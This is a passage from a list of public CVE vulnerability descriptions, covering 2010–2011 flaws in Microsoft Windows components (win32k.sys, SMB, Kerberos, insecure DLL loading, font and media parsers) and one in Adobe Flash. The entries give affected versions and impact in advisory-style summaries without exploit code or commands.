7 Gold and SP1 does not properly restrict the number of console objects for a process, which allows local users to gain privileges or cause a denial of service (memory corruption) via a crafted application that triggers an incorrect memory assignment for a user transaction, aka "CSRSS Local EOP AllocConsole Vulnerability." [CVE-2011-1268] The SMB client in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote SMB servers to execute arbitrary code via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Response Parsing Vulnerability." [CVE-2011-1267] The SMB server in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to cause a denial of service (system hang) via a crafted (1) SMBv1 or (2) SMBv2 request, aka "SMB Request Parsing Vulnerability." [CVE-2011-1265] The Bluetooth Stack 2.1 in Microsoft Windows Vista SP1 and SP2 and Windows 7 Gold and SP1 does not prevent access to objects in memory that (1) were not properly initialized or (2) have been deleted, which allows remote attackers to execute arbitrary code via crafted Bluetooth packets, aka "Bluetooth Stack Vulnerability." [CVE-2011-1264] Cross-site scripting (XSS) vulnerability in Active Directory Certificate Services Web Enrollment in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, R2, and R2 SP1 allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter, aka "Active Directory Certificate Services Vulnerability." [CVE-2011-1263] Cross-site scripting (XSS) vulnerability in the logon page in Remote Desktop Web Access (RD Web Access) in Microsoft Windows Server 2008 R2 and R2 SP1 allows remote attackers to inject arbitrary web script or HTML via the URI, aka "Remote Desktop Web Access Vulnerability." [CVE-2011-1252] Cross-site scripting (XSS) vulnerability in the SafeHTML function in the toStaticHTML API in Microsoft Internet Explorer 7 and 8, Office SharePoint Server 2007 SP2, Office SharePoint Server 2010 Gold and SP1, Groove Server 2010 Gold and SP1, Windows SharePoint Services 3.0 SP2, and SharePoint Foundation 2010 Gold and SP1 allows remote attackers to inject arbitrary web script or HTML via unspecified strings, aka "toStaticHTML Information Disclosure Vulnerability" or "HTML Sanitization Vulnerability." [CVE-2011-1249] The Ancillary Function Driver (AFD) in afd.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Ancillary Function Driver Elevation of Privilege Vulnerability." [CVE-2011-1248] WINS in Microsoft Windows Server 2003 SP2 and Server 2008 Gold, SP2, R2, and R2 SP1 does not properly handle socket send exceptions, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted packets, related to unintended stack-frame values and buffer passing, aka "WINS Service Failed Response Vulnerability." [CVE-2011-1247] Untrusted search path vulnerability in the Microsoft Active Accessibility component in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a Trojan horse DLL in the current working directory, aka "Active Accessibility Insecure Library Loading Vulnerability." [CVE-2011-1243] The Windows Messenger ActiveX control in msgsc.dll in Microsoft Windows XP SP2 and SP3 allows remote attackers to execute arbitrary code via unspecified vectors that "corrupt the system state," aka "Microsoft Windows Messenger ActiveX Control Vulnerability." [CVE-2011-1242] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1241] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1240] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1239] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1238] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1237] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1236] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1235] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1234] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-1233] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1232] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1231] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1230] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1229] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1228] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1227] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1226] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1225] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-1068] Microsoft Windows Azure Software Development Kit (SDK) 1.3.x before 1.3.20121.1237, when Full IIS and a Web Role are used with an ASP.NET application, does not properly support the use of cookies for maintaining state, which allows remote attackers to obtain potentially sensitive information by reading an encrypted cookie and performing unspecified other steps. [CVE-2011-0677] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-0676] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, a different vulnerability than other "Vulnerability Type 2" CVEs listed in MS11-034, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-0675] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0674] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0673] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-0672] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0671] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0670] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0667] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0666] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0665] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0662] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0661] The SMB Server service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate fields in SMB requests, which allows remote attackers to execute arbitrary code via a malformed request in a (1) SMBv1 or (2) SMBv2 packet, aka "SMB Transaction Parsing Vulnerability." [CVE-2011-0660] The SMB client in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote SMB servers to execute arbitrary code via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Client Response Parsing Vulnerability." [CVE-2011-0658] Integer underflow in the OLE Automation protocol implementation in VBScript.dll in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted WMF file, aka "OLE Automation Underflow Vulnerability." [CVE-2011-0657] DNSAPI.dll in the DNS client in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process DNS queries, which allows remote attackers to execute arbitrary code via (1) a crafted LLMNR broadcast query or (2) a crafted application, aka "DNS Query Vulnerability." [CVE-2011-0654] Integer underflow in the BowserWriteErrorLogEntry function in the Common Internet File System (CIFS) browser service in Mrxsmb.sys or bowser.sys in Active Directory in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via a malformed BROWSER ELECTION message, leading to a heap-based buffer overflow, aka "Browser Pool Corruption Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2011-0638] Microsoft Windows does not properly warn the user before enabling additional Human Interface Device (HID) functionality over USB, which allows user-assisted attackers to execute arbitrary programs via crafted USB data, as demonstrated by keyboard and mouse data sent by malware on a smartphone that the user connected to the computer. [CVE-2011-0627] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content, as possibly exploited in the wild in May 2011 by a Microsoft Office document with an embedded .swf file. [CVE-2011-0347] Microsoft Internet Explorer on Windows XP allows remote attackers to trigger an incorrect GUI display and have unspecified other impact via vectors related to the DOM implementation, as demonstrated by cross_fuzz. [CVE-2011-0096] The MHTML protocol handler in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle a MIME format in a request for content blocks in a document, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted web site that is visited in Internet Explorer, aka "MHTML Mime-Formatted Request Vulnerability." [CVE-2011-0091] Kerberos in Microsoft Windows Server 2008 R2 and Windows 7 does not prevent a session from changing from strong encryption to DES encryption, which allows man-in-the-middle attackers to spoof network traffic and obtain sensitive information via a DES downgrade, aka "Kerberos Spoofing Vulnerability." [CVE-2011-0090] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Corruption Vulnerability." [CVE-2011-0089] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Window Class Improper Pointer Validation Vulnerability." [CVE-2011-0088] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Window Class Pointer Confusion Vulnerability." [CVE-2011-0087] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Insufficient User Input Validation Vulnerability." [CVE-2011-0086] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Improper User Input Validation Vulnerability." [CVE-2011-0045] The Trace Events functionality in the kernel in Microsoft Windows XP SP3 does not properly perform type conversion, which causes integer truncation and insufficient memory allocation and triggers a buffer overflow, which allows local users to gain privileges via a crafted application, related to WmiTraceMessageVa, aka "Windows Kernel Integer Truncation Vulnerability." [CVE-2011-0043] Kerberos in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 supports weak hashing algorithms, which allows local users to gain privileges by operating a service that sends crafted service tickets, as demonstrated by the CRC32 algorithm, aka "Kerberos Unkeyed Checksum Vulnerability." [CVE-2011-0042] SBE.dll in the Stream Buffer Engine in Windows Media Player and Windows Media Center in Microsoft Windows XP SP2 and SP3, Windows XP Media Center Edition 2005 SP3, Windows Vista SP1 and SP2, Windows 7 Gold and SP1, and Windows Media Center TV Pack for Windows Vista does not properly parse Digital Video Recording (.dvr-ms) files, which allows remote attackers to execute arbitrary code via a crafted file, aka "DVR-MS Vulnerability." [CVE-2011-0041] Integer overflow in gdiplus.dll in GDI+ in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold and SP2, and Office XP SP3 allows remote attackers to execute arbitrary code via a crafted EMF image, aka "GDI+ Integer Overflow Vulnerability." [CVE-2011-0040] The server in Microsoft Active Directory on Windows Server 2003 SP2 does not properly handle an update request for a service principal name (SPN), which allows remote attackers to cause a denial of service (authentication downgrade or outage) via a crafted request that triggers name collisions, aka "Active Directory SPN Validation Vulnerability." [CVE-2011-0039] The Local Security Authority Subsystem Service (LSASS) in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly process authentication requests, which allows local users to gain privileges via a request with a crafted length, aka "LSASS Length Validation Vulnerability." [CVE-2011-0037] Microsoft Malware Protection Engine before 1.1.6603.0, as used in Microsoft Malicious Software Removal Tool (MSRT), Windows Defender, Security Essentials, Forefront Client Security, Forefront Endpoint Protection 2010, and Windows Live OneCare, allows local users to gain privileges via a crafted value of an unspecified user registry key. [CVE-2011-0034] Stack-based buffer overflow in the OpenType Compact Font Format (aka OTF or CFF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via crafted parameter values in an OpenType font, aka "OpenType Font Stack Overflow Vulnerability." [CVE-2011-0033] The OpenType Compact Font Format (CFF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate parameter values in OpenType fonts, which allows remote attackers to execute arbitrary code via a crafted font, aka "OpenType Font Encoded Character Vulnerability." [CVE-2011-0032] Untrusted search path vulnerability in DirectShow in Microsoft Windows Vista SP1 and SP2, Windows 7 Gold and SP1, Windows Server 2008 R2 and R2 SP1, and Windows Media Center TV Pack for Windows Vista allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Digital Video Recording (.dvr-ms), Windows Recorded TV Show (.wtv), or .mpg file, aka "DirectShow Insecure Library Loading Vulnerability." [CVE-2011-0031] The (1) JScript 5.8 and (2) VBScript 5.8 scripting engines in Microsoft Windows Server 2008 R2 and Windows 7 do not properly load decoded scripts obtained from web pages, which allows remote attackers to trigger memory corruption and consequently obtain sensitive information via a crafted web site, aka "Scripting Engines Information Disclosure Vulnerability." [CVE-2011-0030] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly kill processes after a logout, which allows local users to obtain sensitive information or gain privileges via a crafted application that continues to execute throughout the logout of one user and the login session of the next user, aka "CSRSS Elevation of Privilege Vulnerability," a different vulnerability than CVE-2010-0023. [CVE-2011-0028] WordPad in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly parse fields in Word documents, which allows remote attackers to execute arbitrary code via a crafted .doc file, aka "WordPad Converter Parsing Vulnerability." [CVE-2011-0027] Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2, and Windows Data Access Components (WDAC) 6.0, does not properly validate memory allocation for internal data structures, which allows remote attackers to execute arbitrary code, possibly via a large CacheSize property that triggers an integer wrap and a buffer overflow, aka "ADO Record Memory Vulnerability." NOTE: this might be a duplicate of CVE-2010-1117 or CVE-2010-1118. [CVE-2011-0026] Integer signedness error in the SQLConnectW function in an ODBC API (odbc32.dll) in Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2, and Windows Data Access Components (WDAC) 6.0, allows remote attackers to execute arbitrary code via a long string in the Data Source Name (DSN) and a crafted szDSN argument, which bypasses a signed comparison and leads to a buffer overflow, aka "DSN Overflow Vulnerability." [CVE-2010-5082] Untrusted search path vulnerability in colorcpl.exe 6.0.6000.16386 in the Color Control Panel in Microsoft Windows Server 2008 SP2, R2, and R2 SP1 allows local users to gain privileges via a Trojan horse sti.dll file in the current working directory, as demonstrated by a directory that contains a .camp, .cdmp, .gmmp, .icc, or .icm file, aka "Color Control Panel Insecure Library Loading Vulnerability." [CVE-2010-4701] Heap-based buffer overflow in the CDrawPoly::Serialize function in fxscover.exe in Microsoft Windows Fax Services Cover Page Editor 5.2 r2 in Windows XP Professional SP3, Server 2003 R2 Enterprise Edition SP2, and Windows 7 Professional allows remote attackers to execute arbitrary code via a long record in a Fax Cover Page (.cov) file. NOTE: some of these details are obtained from third party information. [CVE-2010-4669] The Neighbor Discovery (ND) protocol implementation in the IPv6 stack in Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Windows 7 allows remote attackers to cause a denial of service (CPU consumption and system hang) by sending many Router Advertisement (RA) messages with different source addresses, as demonstrated by the flood_router6 program in the thc-ipv6 package. [CVE-2010-4562] Microsoft Windows 2008, 7, Vista, 2003, 2000, and XP, when using IPv6, allows remote attackers to determine whether a host is sniffing the network by sending an ICMPv6 Echo Request to a multicast address and determining whether an Echo Reply is sent, as demonstrated by thcping. NOTE: due to a typo, some sources map CVE-2010-4562 to a ProFTPd mod_sql vulnerability, but that issue is covered by CVE-2010-4652. [CVE-2010-4398] Stack-based buffer overflow in the RtlQueryRegistryValues function in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges, and bypass the User Account Control (UAC) feature, via a crafted REG_BINARY value for a SystemDefaultEUDCFont registry key, aka "Driver Improper Interaction with Windows Kernel Vulnerability." [CVE-2010-4182] Untrusted search path vulnerability in the Data Access Objects (DAO) library (dao360.dll) in Microsoft Windows XP Professional SP3, Windows Server 2003 R2 Enterprise Edition SP3, Windows Vista Business SP1, and Windows 7 Professional allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse msjet49.dll that is located in the same folder as a file that is processed by dao360.dll. NOTE: the provenance of this information is unknown [CVE-2010-3974] fxscover.exe in the Fax Cover Page Editor in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly parse FAX cover pages, which allows remote attackers to execute arbitrary code via a crafted .cov file, aka "Fax Cover Page Editor Memory Corruption Vulnerability." [CVE-2010-3973] The WMITools ActiveX control in WBEMSingleView.ocx 1.50.1131.0 in Microsoft WMI Administrative Tools 1.1 and earlier in Microsoft Windows XP SP2 and SP3 allows remote attackers to execute arbitrary code via a crafted argument to the AddContextRef method, possibly an untrusted pointer dereference, aka "Microsoft WMITools ActiveX Control Vulnerability." [CVE-2010-3970] Stack-based buffer overflow in the CreateSizedDIBSECTION function in shimgvw.dll in the Windows Shell graphics processor (aka graphics rendering engine) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted .MIC or unspecified Office document containing a thumbnail bitmap with a negative biClrUsed value, as reported by Moti and Xu Hao, aka "Windows Shell Graphics Processing Overrun Vulnerability." [CVE-2010-3967] Untrusted search path vulnerability in Microsoft Windows Movie Maker (WMM) 2.6 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Movie Maker (MSWMM) file, aka "Insecure Library Loading Vulnerability." [CVE-2010-3966] Untrusted search path vulnerability in Microsoft Windows Server 2008 R2 and Windows 7, when BranchCache is supported, allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains an EML file, an RSS file, or a WPOST file, aka "BranchCache Insecure Library Loading Vulnerability." [CVE-2010-3965] Untrusted search path vulnerability in Windows Media Encoder 9 on Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Windows Media Profile (PRX) file, aka "Insecure Library Loading Vulnerability." [CVE-2010-3963] 